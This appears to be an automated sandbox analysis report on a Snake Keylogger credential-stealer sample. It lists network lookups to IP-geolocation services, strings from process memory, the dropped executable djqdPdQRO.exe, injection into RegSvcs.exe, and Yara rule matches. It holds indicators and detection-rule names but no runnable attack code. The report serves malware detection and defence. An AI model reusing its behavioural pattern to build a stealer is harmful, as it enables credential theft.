Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000279B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002870000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: file.exe, djqdPdQRO.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: file.exe, djqdPdQRO.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: file.exe, djqdPdQRO.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: file.exe, 00000000.00000002.2230833137.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2279841804.0000000002799000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.2322559999.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.usertrust.
Source: RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: file.exe, djqdPdQRO.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01943E28	0_2_01943E28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0194E214	0_2_0194E214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01947019	0_2_01947019
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07835D18	0_2_07835D18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07838620	0_2_07838620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07838DA8	0_2_07838DA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07838DB8	0_2_07838DB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0787D7F0	0_2_0787D7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0787AFB8	0_2_0787AFB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_078747CF	0_2_078747CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07875F10	0_2_07875F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07873628	0_2_07873628
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07879628	0_2_07879628
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_07877340	0_2_07877340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0787CAE0	0_2_0787CAE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09314980	0_2_09314980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09317248	0_2_09317248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09316D38	0_2_09316D38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0931D5B0	0_2_0931D5B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09314DB8	0_2_09314DB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09314DA9	0_2_09314DA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_09316460	0_2_09316460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0931644F	0_2_0931644F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2C190	7_2_00E2C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2B328	7_2_00E2B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2C470	7_2_00E2C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2C751	7_2_00E2C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E26730	7_2_00E26730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E29858	7_2_00E29858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E24AD9	7_2_00E24AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2CA31	7_2_00E2CA31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2BBD3	7_2_00E2BBD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2BEB0	7_2_00E2BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E2B4F3	7_2_00E2B4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E23570	7_2_00E23570
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_009B3E28	9_2_009B3E28
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_009BE214	9_2_009BE214
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_009B7019	9_2_009B7019
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B35D18	9_2_06B35D18
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B38620	9_2_06B38620
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B38DB8	9_2_06B38DB8
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B38DA8	9_2_06B38DA8
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B7D7F0	9_2_06B7D7F0
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B73628	9_2_06B73628
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B79628	9_2_06B79628
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B7AFB8	9_2_06B7AFB8
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B747CF	9_2_06B747CF
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B75F10	9_2_06B75F10
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B7CAE0	9_2_06B7CAE0
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B77340	9_2_06B77340
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081BC8D8	9_2_081BC8D8
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B4980	9_2_081B4980
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B7248	9_2_081B7248
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B644F	9_2_081B644F
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B6460	9_2_081B6460
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B6D38	9_2_081B6D38
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B4DB8	9_2_081B4DB8
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081B4DA9	9_2_081B4DA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8C192	13_2_00F8C192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8B328	13_2_00F8B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8C470	13_2_00F8C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8C752	13_2_00F8C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F86880	13_2_00F86880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F89858	13_2_00F89858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F84AD9	13_2_00F84AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8CA32	13_2_00F8CA32
